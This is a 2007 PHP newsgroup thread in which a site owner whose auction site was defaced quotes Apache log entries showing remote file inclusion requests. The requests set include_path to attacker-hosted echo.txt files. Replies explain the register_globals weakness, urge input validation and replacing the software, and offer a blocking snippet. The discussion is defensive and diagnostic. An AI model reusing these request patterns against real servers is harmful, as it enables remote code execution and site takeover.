Effect of "include_path" on URL of PHP script

Hello Everyone;

My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and lots
of entries where an "include_path" parameter was included in the URL of the
PHP page, as shown below:

69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow.inc.php?inc lude_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt ?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"

69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"

69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"

213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo .txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo .txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php?include_pa th=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php?include_path=http://www.baybids.co m/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php?include_path=http://www.ba ybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"

I know how "include_path" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a code
404 as the culprits are obviously phising for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.

Can someone explain what adding "include_path" to a URL does?

Is there something I need to check on my server of how I've got Apache
configured?

TIA.

Charles...

Re: Effect of "include_path" on URL of PHP script

Charles Crume wrote:
> Hello Everyone;
>
> My site was hacked the other day -- someone was able to rename my
> index.shtml file and put their own index.html file on my server. Not sure
> how it was done, but looking through the log file, I found a lots and lots
> of entries where an "include_path" parameter was included in the URL of the
> PHP page, as shown below:
>
> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
> /auction/item.php?id=268/includes/auctionstoshow.inc.php?inc lude_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt ?
> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo .txt? HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo .txt? HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
> /auction/item.php?id=268/includes/setting.inc.php?include_pa th=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /includes/setting.inc.php?include_path=http://www.baybids.co m/uploaded/echo.txt?
> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /auction/includes/setting.inc.php?include_path=http://www.ba ybids.com/uploaded/echo.txt?
> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>
> I know how "include_path" works when *in* the PHP file, but I'm not sure
> what the effect of including it in the URL. A number of entries show a code
> 404 as the culprits are obviously phising for pages, but requests with
> return code 200 are showing a large number of bytes transferred -- far
> larger than the PHP page itself.
>
> Can someone explain what adding "include_path" to a URL does?
>
> Is there something I need to check on my server of how I've got Apache
> configured?
>
> TIA.
>
> Charles...
>
>
>

The include_path itself in the url is just a variable. It's what you do
with it that's important. For instance, if you have register_globals
enabled, the include_path in the URL may override the system include_path.

Or, depending on what else you do in your code. This is a big reason
why it's good to use $_POST instead of $_REQUEST if you're posting a
form to a page - $_POST will ignore any $_GET parameters.

And just another reason to *ALWAYS* validate data coming from the user.

--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
jstucklex@attglobal.net
==================

Re: Effect of "include_path" on URL of PHP script

Hi Jerry;

Thanks!!!

I am using an auction software package the *requires* register_globals to be
enabled. I took a look at my PHP.INI file and saw where I had changed this
setting years ago (had put some comments as to what, why, and when the
change was made in the file).

I have turned register_globals off (of course the auction software no longer
works) until I figure out what to do.

Thanks again for your help!

Charles...




"Jerry Stuckle" wrote in message
news:D7-dnQ0RJ6npTY_anZ2dnUVZ_gOdnZ2d@comcast.com...
> Charles Crume wrote:
>> Hello Everyone;
>>
>> My site was hacked the other day -- someone was able to rename my
>> index.shtml file and put their own index.html file on my server. Not sure
>> how it was done, but looking through the log file, I found a lots and
>> lots of entries where an "include_path" parameter was included in the URL
>> of the PHP page, as shown below:
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
>> /auction/item.php?id=268/includes/auctionstoshow.inc.php?inc lude_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt ?
>> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
>> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo .txt?
>> HTTP/1.1"
>> 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
>> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo .txt?
>> HTTP/1.1"
>> 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
>> /auction/item.php?id=268/includes/setting.inc.php?include_pa th=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /includes/setting.inc.php?include_path=http://www.baybids.co m/uploaded/echo.txt?
>> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /auction/includes/setting.inc.php?include_path=http://www.ba ybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>>
>> I know how "include_path" works when *in* the PHP file, but I'm not sure
>> what the effect of including it in the URL. A number of entries show a
>> code 404 as the culprits are obviously phising for pages, but requests
>> with return code 200 are showing a large number of bytes transferred --
>> far larger than the PHP page itself.
>>
>> Can someone explain what adding "include_path" to a URL does?
>>
>> Is there something I need to check on my server of how I've got Apache
>> configured?
>>
>> TIA.
>>
>> Charles...
>>
>>
>>
>
> The include_path itself in the url is just a variable. It's what you do
> with it that's important. For instance, if you have register_globals
> enabled, the include_path in the URL may override the system include_path.
>
> Or, depending on what else you do in your code. This is a big reason why
> it's good to use $_POST instead of $_REQUEST if you're posting a form to a
> page - $_POST will ignore any $_GET parameters.
>
> And just another reason to *ALWAYS* validate data coming from the user.
>
> --
> ==================
> Remove the "x" from my email address
> Jerry Stuckle
> JDS Computer Training Corp.
> jstucklex@attglobal.net
> ==================
>

Re: Effect of "include_path" on URL of PHP script

Charles Crume wrote:
> Hi Jerry;
>
> Thanks!!!
>
> I am using an auction software package the *requires* register_globals to be
> enabled. I took a look at my PHP.INI file and saw where I had changed this
> setting years ago (had put some comments as to what, why, and when the
> change was made in the file).
>
> I have turned register_globals off (of course the auction software no longer
> works) until I figure out what to do.
>
> Thanks again for your help!
>
> Charles...
>
>
>
>
> "Jerry Stuckle" wrote in message
> news:D7-dnQ0RJ6npTY_anZ2dnUVZ_gOdnZ2d@comcast.com...
>> Charles Crume wrote:
>>> Hello Everyone;
>>>
>>> My site was hacked the other day -- someone was able to rename my
>>> index.shtml file and put their own index.html file on my server. Not sure
>>> how it was done, but looking through the log file, I found a lots and
>>> lots of entries where an "include_path" parameter was included in the URL
>>> of the PHP page, as shown below:
>>>
>>> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
>>> /auction/item.php?id=268/includes/auctionstoshow.inc.php?inc lude_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt ?
>>> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>>>
>>> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
>>> /auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
>>> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>>>
>>> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
>>> /auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
>>> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
>>> /auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
>>> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
>>> /index.php?include_path=http://www.baybids.com/uploaded/echo .txt?
>>> HTTP/1.1"
>>> 404 310 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
>>> /auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
>>> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
>>> /index.php?include_path=http://www.baybids.com/uploaded/echo .txt?
>>> HTTP/1.1"
>>> 404 310 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
>>> /auction/item.php?id=268/includes/setting.inc.php?include_pa th=http://www.baybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>>> /includes/setting.inc.php?include_path=http://www.baybids.co m/uploaded/echo.txt?
>>> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>>>
>>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>>> /auction/includes/setting.inc.php?include_path=http://www.ba ybids.com/uploaded/echo.txt?
>>> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>>>
>>> I know how "include_path" works when *in* the PHP file, but I'm not sure
>>> what the effect of including it in the URL. A number of entries show a
>>> code 404 as the culprits are obviously phising for pages, but requests
>>> with return code 200 are showing a large number of bytes transferred --
>>> far larger than the PHP page itself.
>>>
>>> Can someone explain what adding "include_path" to a URL does?
>>>
>>> Is there something I need to check on my server of how I've got Apache
>>> configured?
>>>
>>> TIA.
>>>
>>> Charles...
>>>
>>>
>>>
>> The include_path itself in the url is just a variable. It's what you do
>> with it that's important. For instance, if you have register_globals
>> enabled, the include_path in the URL may override the system include_path.
>>
>> Or, depending on what else you do in your code. This is a big reason why
>> it's good to use $_POST instead of $_REQUEST if you're posting a form to a
>> page - $_POST will ignore any $_GET parameters.
>>
>> And just another reason to *ALWAYS* validate data coming from the user.
>>
>> --
>> ==================
>> Remove the "x" from my email address
>> Jerry Stuckle
>> JDS Computer Training Corp.
>> jstucklex@attglobal.net
>> ==================
>>
>
>
>

If your software is so old that it requires register_globals, it
probably has other security holes, also.

If they don't have an upgraded version, I'd suggest you find another
package. Otherwise, chances are you'll have this happen again.
Especially since they now know you're vulnerable.

--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
jstucklex@attglobal.net
==================

Re: Effect of "include_path" on URL of PHP script

Charles Crume wrote:
> Hi Jerry;
>
> Thanks!!!
>
> I am using an auction software package the *requires* register_globals to be
> enabled. I took a look at my PHP.INI file and saw where I had changed this
> setting years ago (had put some comments as to what, why, and when the
> change was made in the file).
>
> I have turned register_globals off (of course the auction software no longer
> works) until I figure out what to do.
>
> Thanks again for your help!
>
> Charles...

And I forgot - please don't top post. Thanks.

--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
jstucklex@attglobal.net
==================

Re: Effect of "include_path" on URL of PHP script

On Oct 14, 9:56 pm, "Charles Crume"
wrote:
> Hello Everyone;
>
> My site was hacked the other day -- someone was able to rename my
> index.shtml file and put their own index.html file on my server. Not sure
> how it was done, but looking through the log file, I found a lots and lots
> of entries where an "include_path" parameter was included in the URL of the
> PHP page, as shown below:
>
> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
> /auction/item.php?id=268/includes/auctionstoshow.inc.php?inc lude_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt ?
> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo .txt?HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo .txt?HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
> /auction/item.php?id=268/includes/setting.inc.php?include_pa th=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /includes/setting.inc.php?include_path=http://www.baybids.co m/uploaded/echo.txt?
> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /auction/includes/setting.inc.php?include_path=http://www.ba ybids.com/uploaded/echo.txt?
> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>
> I know how "include_path" works when *in* the PHP file, but I'm not sure
> what the effect of including it in the URL. A number of entries show a code
> 404 as the culprits are obviously phising for pages, but requests with
> return code 200 are showing a large number of bytes transferred -- far
> larger than the PHP page itself.
>
> Can someone explain what adding "include_path" to a URL does?
>
> Is there something I need to check on my server of how I've got Apache
> configured?
>
> TIA.
>
> Charles...

Hi,

I've been the target also of a hacker, with the same attack.

Add this to you script:

=====

$php_self = $_SERVER['PHP_SELF'];

if (($php_self == "/auction/includes/settings.inc.php") &&
(ini_get(register_globals))) {
$rg = array_keys($_REQUEST);
foreach($rg as $var)
{
if ($_REQUEST[$var] === $$var)
{
unset($$var);
exit;
}
}
}

=======

This will check if they are running the file, if register_globals is
enabled catch the parameters and unset them then halt the script.

So far it is working.

Jean

Re: Effect of "include_path" on URL of PHP script

..oO(Charles Crume)

>I am using an auction software package the *requires* register_globals to be
>enabled.

You shouldn't use it anymore and look for a better script, that doesn't
rely on insecure and deprecated features. register_globals is history
and will be completely dropped with PHP 6.

Micha

Re: Effect of "include_path" on URL of PHP script

Hi Jean;

This has to be added to every script, correct? (If so, it would be too much
work and I would be better off to purchase newer auction software.)

I am also looking at use mod_rewrite in Apache to redirect any request with
"include_path" in it to a null page. Does anyone have thoughts on this
approach?

TIA.

Charles...




"Jean Gaudreau" wrote in message
news:1192541328.007138.293000@i13g2000prf.googlegroups.com.. .
> On Oct 14, 9:56 pm, "Charles Crume"
> wrote:
>> Hello Everyone;
>>
>> My site was hacked the other day -- someone was able to rename my
>> index.shtml file and put their own index.html file on my server. Not sure
>> how it was done, but looking through the log file, I found a lots and
>> lots
>> of entries where an "include_path" parameter was included in the URL of
>> the
>> PHP page, as shown below:
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
>> /auction/item.php?id=268/includes/auctionstoshow.inc.php?inc lude_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt ?
>> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.u siauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
>> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo .txt?HTTP/1.1"
>> 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploa ded/echo.txt?
>> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo .txt?HTTP/1.1"
>> 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
>> /auction/item.php?id=268/includes/setting.inc.php?include_pa th=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /includes/setting.inc.php?include_path=http://www.baybids.co m/uploaded/echo.txt?
>> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /auction/includes/setting.inc.php?include_path=http://www.ba ybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>>
>> I know how "include_path" works when *in* the PHP file, but I'm not sure
>> what the effect of including it in the URL. A number of entries show a
>> code
>> 404 as the culprits are obviously phising for pages, but requests with
>> return code 200 are showing a large number of bytes transferred -- far
>> larger than the PHP page itself.
>>
>> Can someone explain what adding "include_path" to a URL does?
>>
>> Is there something I need to check on my server of how I've got Apache
>> configured?
>>
>> TIA.
>>
>> Charles...
>
> Hi,
>
> I've been the target also of a hacker, with the same attack.
>
> Add this to you script:
>
> =====
>
> $php_self = $_SERVER['PHP_SELF'];
>
> if (($php_self == "/auction/includes/settings.inc.php") &&
> (ini_get(register_globals))) {
> $rg = array_keys($_REQUEST);
> foreach($rg as $var)
> {
> if ($_REQUEST[$var] === $$var)
> {
> unset($$var);
> exit;
> }
> }
> }
>
> =======
>
> This will check if they are running the file, if register_globals is
> enabled catch the parameters and unset them then halt the script.
>
> So far it is working.
>
> Jean
>

Re: Effect of "include_path" on URL of PHP script

I know... however this is easier said than done. Lot's of work to re-enter
customer info, sales info, items, etc.

Hopefully I will find another solution.

Thanks.

Charles...



"Michael Fesser" wrote in message
news:c62ah31882el64mccf39u37n8utb5ku9i6@4ax.com...
> .oO(Charles Crume)
>
>>I am using an auction software package the *requires* register_globals to
>>be
>>enabled.
>
> You shouldn't use it anymore and look for a better script, that doesn't
> rely on insecure and deprecated features. register_globals is history
> and will be completely dropped with PHP 6.
>
> Micha

Re: Effect of "include_path" on URL of PHP script

Post removed (X-No-Archive: yes)

Re: Effect of "include_path" on URL of PHP script

"Gary L. Burnore" wrote in message
news:ff65u5$ag1$2@blackhelicopter.databasix.com...
> On Wed, 17 Oct 2007 19:23:17 -0400, "Charles Crume"
> wrote:
>
>>I know... however this is easier said than done. Lot's of work to re-enter
>>customer info, sales info, items, etc.
>>
>>Hopefully I will find another solution.
>>
>>Thanks.
>>
>>Charles...
>
> What's with the recent rash of top posters?

Google noticed the activity in this group doubled - although, it's mostly
spam.